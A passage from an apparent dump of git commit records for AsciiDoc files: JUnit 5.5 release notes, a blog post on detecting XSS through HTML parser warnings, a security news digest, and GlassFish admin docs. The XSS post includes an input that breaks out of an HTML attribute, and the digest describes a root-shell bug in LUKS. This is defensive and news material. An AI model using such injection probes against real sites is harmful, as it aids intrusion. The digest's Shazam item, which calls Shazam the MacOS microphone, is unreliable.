by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. 
Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* Support for declarative timeouts using `@Timeout` or configuration parameters (see\n <<..\/user-guide\/index.adoc#writing-tests-declarative-timeouts, User Guide>> for details)\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n* Added support for method URIs, e.g. `method:org.junit.Foo#bar()`, to `DynamicContainer`\n and `DynamicTest` factory methods.\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of `junit-vintage-engine` to allow for\n easier dependency management in Maven POMs.\n","old_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? 
extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* Support for declarative timeouts using `@Timeout` or configuration parameters (see\n <<..\/user-guide\/index.adoc#writing-tests-declarative-timeouts, User Guide>> for details)\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of `junit-vintage-engine` to allow for\n easier dependency management in Maven POMs.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"065d8961c5ef5f9ef2f3d4c81a49cd159ec2aef5","subject":"Update 2015-05-24-More-XSS-Updates-Analyzer.adoc","message":"Update 2015-05-24-More-XSS-Updates-Analyzer.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-24-More-XSS-Updates-Analyzer.adoc","new_file":"_posts\/2015-05-24-More-XSS-Updates-Analyzer.adoc","new_contents":"= More XSS Updates (Analyzer)\n\nI once had a feature in Sentinel, which 
beautified the HTML source code of HTTP responses (using jtidy). This can be very useful for the user, as it can be hard to navigate and read machine-generated HTML code (or just think of stripped newlines). Sadly it had an unfortunate behaviour: it stripped (\"beautified\") partial XSS, like surplus single or double quotes in tags. I never thought about it much again.\n\nAs described in the last post, the OWASP AppSecEU 15 presentation with the title of \"Finding Bad Needles on a Worldwide Scale\" http:\/\/www.slideshare.net\/dimisec\/badneedles discussed finding XSS vulnerabilities on a large scale. The author explained a technique where he just let an HTTP parser parse the HTTP response. If a syntax error occurred, the attack payload broke the context, which is a good indicator for a successful XSS attack. \n\nWhen I saw that jtidy has a log message listener (http:\/\/sourceforge.net\/p\/jtidy\/code\/HEAD\/tree\/trunk\/jtidy\/src\/main\/java\/org\/w3c\/tidy\/TidyMessageListener.java), I realized I already had all the things I needed to implement this feature too.\n\n\n== Testing onmouseover\n\nOriginal: changeme4\n\n[source]\n----\n<H2>Update Your Preferences<\/H2><p>\n<FORM>\nHomepage: <input value=\"changeme4\" name=\"in\" size=\"40\"><BR>\n<input type=\"submit\" value=\"Change\"><\/FORM>\n----\n\n\n[source]\n----\n23 - trimming empty <p>\n110 - InputStream: Doctype given is \"\"\n111 - InputStream: Document content looks like HTML 3.2\n----\n\nWith the input vector of: changeme4Xssaa\"+= (the + is whitespace, URL encoded)\n\n[source]\n----\n<H2>Update Your Preferences<\/H2><p>\n<FORM>\nHomepage: <input value=\"changeme4Xssaa\" =\" name=\"in\" size=\"40\"><BR>\n<input type=\"submit\" value=\"Change\"><\/FORM>\n----\n\n[source]\n----\n23 - trimming empty <p>\n69 - <input> unexpected =, expected attribute name\n59 - <input> unexpected or duplicate quote mark\n110 - InputStream: Doctype given is \"\"\n111 - InputStream: Document content looks like HTML 3.2\n----\n\n\n== Sample output\n\n\n","old_contents":"= More XSS Updates (Analyzer)\n\nI once had a feature in Sentinel, which beautified the HTML source code of HTTP responses (using jtidy). This can be very useful for the user, as it can be hard to navigate and read machine-generated HTML code (or just think of stripped newlines). Sadly it had an un-nice behaviour: it stripped (\"beautified\") partial XSS, like surplus single or double quotes in tags. I never thought about it much again.\n\nAs described in the last post, the OWASP AppSecEU 15 presentation with the title of \"Finding Bad Needles on a Worldwide Scale\" http:\/\/www.slideshare.net\/dimisec\/badneedles discussed finding XSS vulnerabilities on a large scale. The author explained a techniq where he just let a HTTP parser parse the HTTP response. If a syntax error occured, the attack payload was breaking the context, which is a good indicator for a successful XSS attack. 
There i realized i already have all the things i need to implement this feature too.\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0d296a6e9a124751d44958aa4eb52fc15f4c867a","subject":"Update 2016-11-16-Hacking-Daily-News-161116.adoc","message":"Update 2016-11-16-Hacking-Daily-News-161116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-16-Hacking-Daily-News-161116.adoc","new_file":"_posts\/2016-11-16-Hacking-Daily-News-161116.adoc","new_contents":"= Hacking Daily News (16\/11\/16)\n\nimage::DDoSortreat.jpeg[500,300] \n\nNOTE: -Spamhaus DDoS suspect will not go to prison +\n-Google takes up positions in the new Trump world +\n-Valencian researchers find Linux owned by holding Enter +\n-Twitter gives the FBI real-time surveillance +\n-The MacOS mic keeps recording without warning +\n\n\n* *The man accused of the DDoS against Spamhaus will not spend a single day in prison* +\nThey were the strongest DDoS attacks of their time, back in 2013, with peaks of more than 300 Gbps that managed to slow down the Internet. The Dutch hacker Sven Olaf Kamphuis was arrested in Barcelona, accused of taking part in them, and spent 55 days in prison while awaiting extradition to his country. Now a judge has ruled that those days in prison were punishment enough and he will not have to serve a single day more. In July 2015 another young man was arrested, in Great Britain, accused of the same attack. Seth Nolan Mcdonagh has been sentenced to 240 hours of community service. And so close the consequences for the alleged perpetrators of one of the strongest attacks ever aimed at the entire network. \nhttp:\/\/securityaffairs.co\/wordpress\/53473\/cyber-crime\/spamhaus-attack.html\n\n* *Google takes up positions in the Trump transition's Federal Trade Commission* +\nSwinging toward Trump does not seem to cost Google much, according to an article in \"The Intercept\". Joshua Wright will be the one handling Google's lobbying work at the FTC. Meanwhile, The New York Times publishes a long letter by Julian Assange titled \"The Banality of \u2018Don\u2019t Be Evil\u2019\", in which he accuses Eric Schmidt and Jared Cohen of having murdered privacy and of steering the world toward authoritarianism. Since we do not like having to hand our data to The New York Times to read its news (and we do not understand what Assange is doing publishing pieces about privacy there), we leave you instead with the summary of the affair that Michael Moore has posted on his Facebook (another one cut from the same cloth).\nhttps:\/\/theintercept.com\/2016\/11\/15\/google-gets-a-seat-on-the-trump-transition-team\/\nhttps:\/\/www.facebook.com\/mmflint\/posts\/366514833450574\n\n* *Linux can be owned just by holding the Enter key down for 70 seconds* +\nIt was discovered by two researchers closely tied to the Universitat Polit\u00e8cnica de Val\u00e8ncia, and right now the news is spreading like wildfire across the Internet. H\u00e9ctor Marco and Ismael Ripoll found this vulnerability, which lets an attacker obtain a root shell in initramfs by holding the Enter key down for 70 seconds. It is caused by a bug in Linux Unified Key Setup (LUKS) and makes it possible to attack encrypted Linux machines. 
\nhttp:\/\/www.theregister.co.uk\/2016\/11\/16\/want_to_pop_linux_shell_hole_enter_for_a_minute\/\n\n* *Twitter puts a real-time surveillance tool in the FBI's hands* +\nTwitter has handed the FBI an advanced real-time surveillance tool that will be used, initially, on 200 Twitter accounts under police investigation, supposedly belonging to \"terrorists\" and \"criminals\". The tool makes it possible to search public (we assume) Twitter conversations in practically real time, with customizable filters. \nhttp:\/\/www.theverge.com\/2016\/11\/14\/13629248\/fbi-dataminr-twitter-surveillance-contract-scanning-police\n\n* *On how Shazam, the internal MacOS mic, keeps recording you even when you stop recording* +\nResearch carried out by Patrick Warkle during a trip to Ekoparty.\nhttps:\/\/objective-see.com\/blog\/blog_0x13.html\n\n","old_contents":"= Hacking Daily News (16\/11\/16)\n\nimage::DDoSortreat.jpeg[500,300] \n\nNOTE: -Acusado del DDos contra Spamhaus no ir\u00e1 a prisi\u00f3n +\n-Google toma posiciones en el nuevo mundo Trump +\n-Linux owneado apretando Enter +\n-Twitter permite espionaje en tiempo real al FBI +\n-El micro de MacOS sigue grabando sin avisar +\n\n\n* *El acusado del DDoS contra Spamhaus no pasar\u00e1 ni un d\u00eda en prisi\u00f3n* +\nFueron los ataques DDoS m\u00e1s fuertes del momento, en 2013, con picos de m\u00e1s de 300 Gbps que consiguieron ralentizar Internet. El hacker holand\u00e9s Sven Olaf Kamphuis fue detenido en Barcelona acusado de participar en ellos y estuvo 55 d\u00edas en prisi\u00f3n mientras esperaba la extradici\u00f3n a su pa\u00eds. Ahora un juez dice que con estos d\u00edas en prisi\u00f3n ya ha tenido suficiente y no deber\u00e1 pasar ni uno m\u00e1s. En julio de 2015 otro joven fue detenido, en Gran Breta\u00f1a, acusado del mismo ataque. Seth Nolan Mcdonagh ha sido sentenciado a 240 horas de trabajo comunitario. Y as\u00ed se cierran las consecuencias para los posibles responsables de uno de los ataques m\u00e1s fuertes contra toda la red. \nhttp:\/\/securityaffairs.co\/wordpress\/53473\/cyber-crime\/spamhaus-attack.html\n\n* *Google toma posiciones en la Federal Trade Comission de transici\u00f3n a Trump* +\nNo parece costarle demasiado a Google virar hacia Trump, asegura un art\u00edculo en \"The Intercept\". Joshua Wright ser\u00e1 el encargado de hacer las tareas de lobby para Google en la FTC. Por otra parte, The New York Times publica una larga carta de Julian Assange titulada \"The Banality of \u2018Don\u2019t Be Evil\u2019\" en la que acusa a Eric Schmidt y Jared Cohen de haber asesinado la privacidad y conducir al mundo hacia el autoritarismo. Como no nos gusta tener que dar nuestros datos a The New York Times para leer sus noticias (y no entendemos qu\u00e9 hace Assange publicando cosas sobre privacidad all\u00ed), os dejamos mejor el resumen del tema que ha hecho Michael Moore en su Facebook (otro que tal baila).\nhttps:\/\/theintercept.com\/2016\/11\/15\/google-gets-a-seat-on-the-trump-transition-team\/\nhttps:\/\/www.facebook.com\/mmflint\/posts\/366514833450574\n\n* *Linux puede ser owneado s\u00f3lo con apretar 70 segundos la tecla Enter* +\nLo han descubierto dos investigadores muy ligados a la Universitat Polit\u00e8cnica de Val\u00e8ncia y a estas horas la noticia corre como p\u00f3lvora por toda Internet. 
H\u00e9ctor Marco e Ismael Ripoll han descubierto esta vulnerabilidad que permite a un atacante conseguir shell de root en initramfs al apretar durante 70 segundos la tecla Enter. Esto se debe a un bug en Linux Unified Key Setup (LUKS) y permite atacar m\u00e1quinas Linux con cifrado. \nhttp:\/\/www.theregister.co.uk\/2016\/11\/16\/want_to_pop_linux_shell_hole_enter_for_a_minute\/\n\n* *Twitter pone en manos del FBI una herramienta para espionaje en tiempo real* +\nTwitter ha puesto en manos del FBI una herramienta de espionaje avanzado en tiempo real que usar\u00e1, en principio, sobre 200 cuentas de Twitter investigadas por la polic\u00eda, supuestamente pertenecientes a \"terroristas\" y \"criminales\". La herramienta permite hacer b\u00fasquedas en conversaciones p\u00fablicas (suponemos) de Twitter en pr\u00e1cticamente tiempo real y con filtros personalizables. \nhttp:\/\/www.theverge.com\/2016\/11\/14\/13629248\/fbi-dataminr-twitter-surveillance-contract-scanning-police\n\n* *De c\u00f3mo Shazam, el micro interno de MacOS, te sigue grabando aunque dejes de grabar* +\nInvestigaci\u00f3n realizada por Patrick Warkle durante un viaje a la Ekoparty.\nhttps:\/\/objective-see.com\/blog\/blog_0x13.html\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7ca20fc023c81abc73cfa49a596940ad7a1ef9dc","subject":"Clean up Glassfish administration docs.","message":"Clean up Glassfish administration docs.\n","repos":"BrentDouglas\/chainlink,BrentDouglas\/chainlink","old_file":"doc\/src\/main\/asciidoc\/administration-glassfish.adoc","new_file":"doc\/src\/main\/asciidoc\/administration-glassfish.adoc","new_contents":"=== GlassFish\n\n==== Using `asadmin`\n\nThe following `asadmin` commands are provided for GlassFish:\n\n- get-chainlink\n- get-chainlink-job-operator -j <job operator name>\n- get-chainlink-deployment -d <deployment name>\n- get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- set-chainlink [ -f <filename> | -b <base 64 of file> ]\n- set-chainlink-job-operator [ -f <filename> | -b <base 64 of file> ]\n- set-chainlink-deployment [ -f <filename> | -b <base 64 of file> ]\n- set-chainlink-deployment-job-operator -d <deployment name> [ -f <filename> | -b <base 64 of file> ]\n- delete-chainlink\n- delete-chainlink-job-operator -j <job operator name>\n- delete-chainlink-deployment -d <deployment name>\n- delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- reload-chainlink\n\n[NOTE]\n====\nThe output of the `get-chainlink-*` commands is not formatted. To make it easier to read you might\nconsider using them with the `asadmin` terse option (`-t` or `--terse`) and combining them with an xml\nformatter. e.g.\n\n`.\/asadmin -t get-chainlink | xmllint --format -`\n====\n\nThe options for the commands all function more or less the same across commands. 
Here is a quick\nreference, though they are elaborated on per command.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element the command is to be applied to.\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that either the command is to be applied to or that\ncontains the `job-operator` element the command is to be applied to.\n|`-f \\| --file`\n|The filename of a file containing the xml snippet to be applied to the model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml snippet to be applied to the model.\n|===\n\n\n[TIP]\n====\nThe recommended way of updating Chainlink's configuration is to retrieve the existing configuration,\nmodify it, and then upload the modifications. e.g. To change the whole server config:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink -f ~\/config.xml\n----\n\nOr just a single operator:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink-deployment-job-operator -d default -j default | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink-deployment-job-operator -d default -j default -f ~\/config.xml\n----\n====\n\n===== get-chainlink\n\nReturn the entire Chainlink subsystem configuration. This command should never fail. The output is\nxml from the schema `chainlink-subsystem_1_0.xsd`.\n\n===== get-chainlink-job-operator -j <job operator name>\n\nReturn the configuration from a single named `job-operator` element. The output is an xml snippet\nof a `job-operator` element from the schema `chainlink_1_0.xsd`. This command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be retrieved. The element must\nbe a child of the `subsystem` element in the schema.\n|===\n\n===== get-chainlink-deployment -d <deployment name>\n\nReturn the configuration from a single named `deployment` element. The output is an xml snippet of\na `deployment` element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. The `deployment` parameter is not provided.\n2. The named `deployment` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element to be retrieved.\n|===\n\n===== get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nReturn the configuration from a single named `job-operator` element within a named `deployment` element. The\noutput is an xml snippet of a `job-operator` element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named `deployment` element does not exist.\n3. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that contains the `job-operator`\nelement.\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be retrieved. The element must\nbe a child of the `deployment` element in the schema.\n|===\n\n===== set-chainlink [ -f <filename> | -b <base 64 of file> ]\n\nSet Chainlink's configuration to match that of the provided xml. This command is an 'upsert'. 
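For example, you might upload a configuration file directly, or pass the same file as a base64 string (a sketch that assumes a GNU coreutils `base64` is on the path):\n\n[source,shell]\n----\n.\/asadmin set-chainlink -f ~\/config.xml\n# or, equivalently, via the -b flag:\n.\/asadmin set-chainlink -b $(base64 -w0 ~\/config.xml)\n----\n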
The\ncommand will fail if:\n\n1. Neither of the arguments `file` or `base64` is provided.\n2. Both of the arguments `file` and `base64` are provided.\n3. The xml content provided is not valid according to the schema `chainlink-subsystem_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== set-chainlink-job-operator [ -f <filename> | -b <base 64 of file> ]\n\nSet a named `job-operator` element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` is provided.\n2. Both of the arguments `file` and `base64` are provided.\n3. The xml content provided is not a valid snippet of the `job-operator` element in the schema\n `chainlink_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== set-chainlink-deployment [ -f <filename> | -b <base 64 of file> ]\n\nSet a named `deployment` element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` is provided.\n2. Both of the arguments `file` and `base64` are provided.\n3. The xml content provided is not a valid snippet of the `deployment` element in the schema\n `chainlink_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== set-chainlink-deployment-job-operator -d <deployment name> [ -f <filename> | -b <base 64 of file> ]\n\nSet a named `job-operator` element within a named `deployment` element to match that of the provided\nxml. This command is an 'upsert'. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n3. Neither of the arguments `file` or `base64` is provided.\n4. Both of the arguments `file` and `base64` are provided.\n5. The xml content provided is not a valid snippet of the `job-operator` element in the schema\n `chainlink_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that contains\/will contain the\n `job-operator` element.\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== delete-chainlink\n\nRemove all Chainlink configuration. This command will always succeed. This command will return the\nexisting configuration as per the `get-chainlink` command.\n\n===== delete-chainlink-job-operator -j <job operator name>\n\nRemove a single named `job-operator` element. This command will return the existing configuration\nas per the `get-chainlink-job-operator` command. This command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be removed. The element must\n be a child of the `subsystem` element in the schema.\n|===\n\n===== delete-chainlink-deployment -d <deployment name>\n\nRemove a single named `deployment` element. This command will return the existing configuration as\nper the `get-chainlink-deployment` command. 
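Since the removed configuration is echoed back, you can capture it for a later restore (a sketch assuming a deployment named `default`, as in the TIP above):\n\n[source,shell]\n----\n.\/asadmin -t delete-chainlink-deployment -d default | xmllint --format - > ~\/deployment-backup.xml\n.\/asadmin reload-chainlink\n# if needed, restore it later with:\n.\/asadmin set-chainlink-deployment -f ~\/deployment-backup.xml\n----\n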
The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element to be removed.\n|===\n\n===== delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nRemove a single `job-operator` element contained in a named `deployment` element. This command will\nreturn the existing configuration as per the `get-chainlink-deployment-job-operator` command. This\ncommand will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named `deployment` element does not exist.\n3. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that contains the `job-operator`\n element.\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be removed. The element must\n be a child of the `deployment` element in the schema.\n|===\n\n===== reload-chainlink\n\nApply the configuration changes to the Chainlink runtime.\n\n[TIP]\n====\nAccidentally call `delete-chainlink`? The existing configuration is returned so you can save it to a\nfile and then upload it again with `set-chainlink`. Remember, configuration changes are not visible to\nChainlink until `reload-chainlink` is called.\n====","old_contents":"=== GlassFish\n\n==== Using `asadmin`\n\nThe following asadmin commands are provided for Glassfish:\n\n- get-chainlink\n- get-chainlink-job-operator -j <job operator name>\n- get-chainlink-deployment -d <deployment name>\n- get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- set-chainlink [ -f <file> | -b <base 64 of file> ]\n- set-chainlink-job-operator [ -f <file> | -b <base 64 of file> ]\n- set-chainlink-deployment [ -f <file> | -b <base 64 of file> ]\n- set-chainlink-deployment-job-operator -d <deployment name> [ -f <file> | -b <base 64 of file> ]\n- delete-chainlink\n- delete-chainlink-job-operator -j <job operator name>\n- delete-chainlink-deployment -d <deployment name>\n- delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- reload-chainlink\n\n[NOTE]\n====\nThe output of the `get-chainlink-*` commands are not formatted. To make it easier to read you might\nconsider using them with asadmin's terse (-t or --terse) options and combining them with an xml\nformatter. e.g.\n\n`.\/asadmin -t get-chainlink | xmllint --format -`\n====\n\nThe options for the commands all function mor or less the same across commands. Here is a quick\nreference, though they are elaborated on per command.\n\n-j|--job-operator The name attribute of the job-operator element the command is to be applied to\n-d|--deployment The name attribute of the deployment element the command is to be applied to\n-f|--file The filename of a file containing the xml snippet to be applied to the model\n-b|--base64 A base64 encoded string ot the xml snippet to be applied to the model\n\n\n[TIP]\n====\nThe recommended way of updating chainlink's configuration is to retrieve the existing configuration,\nmodify it, and then upload the modifications. e.g. 
To change the whole server config:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink -f ~\/config.xml\n----\n\nOr just a single operator:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink-deployment-job-operator -d default -j default | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink-deployment-job-operator -d default -j default -f ~\/config.xml\n----\n====\n\n===== get-chainlink\n\nPrints the entire Chainlink subsystem configuration. This command should never fail. The output is\nxml from the schema `chainlink-subsystem_1_0.xsd`.\n\n===== get-chainlink-job-operator -j <job operator name>\n\nPrint the configuration from a single named job-operator element. The output is an xml snippet xml\nof a job-operator element from the schema `chainlink_1_0.xsd`.\nThis command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named job-operator element does not exist.\n\n-j|--job-operator The name attribute of the job-operator element to be retrieved. The element must\n be a child of the subsystem element in the schema.\n\n===== get-chainlink-deployment -d <deployment name>\n\nPrint the configuration from a single named deployment element. The output is an xml snippet xml of\na deployment element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. The `deployment` parameter is not provided.\n2. The named deployment element does not exist.\n\n-d|--deployment The name attribute of the deployment element to be retrieved.\n\n===== get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nPrint the configuration from a single named job-operator element from a named deployment. The\noutput is an xml snippet xml of a job-operator element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named deployment element does not exist.\n3. The named job-operator element does not exist.\n\n-d|--deployment The name attribute of the deployment element that contains the job-operator\n element.\n-j|--job-operator The name attribute of the job-operator element to be retrieved. The element must\n be a child of the deployment element in the schema.\n\n===== set-chainlink [ -f <file> | -b <base 64 of file> ]\n\nSet Chainlink's configuration to match that of the provided xml. This command is an 'upsert'. The\ncommand will fail if:\n\n1. Neither of the arguments `file` or `base64` are be provided\n2. Both of the arguments `file` or `base64` are be provided\n3. The xml content provided is not valid according to the schema `chainlink-subsystem_1_0.xsd`\n\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== set-chainlink-job-operator [ -f <file> | -b <base 64 of file> ]\n\nSet a named job-operator element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` are be provided\n2. Both of the arguments `file` or `base64` are be provided\n3. 
The xml content provided is not a valid snipped of the job-operator element in the schema\n `chainlink_1_0.xsd`\n\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== set-chainlink-deployment [ -f <file> | -b <base 64 of file> ]\n\nSet a named deployment element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` are be provided\n2. Both of the arguments `file` or `base64` are be provided\n3. The xml content provided is not a valid snipped of the deployment element in the schema\n `chainlink_1_0.xsd`\n\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== set-chainlink-deployment-job-operator -d <deployment name> [ -f <file> | -b <base 64 of file> ]\n\nSet a named job-operator element from a named deployment element to match that of the provided\nxml. This command is an 'upsert'. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n3. Neither of the arguments `file` or `base64` are be provided\n4. Both of the arguments `file` or `base64` are 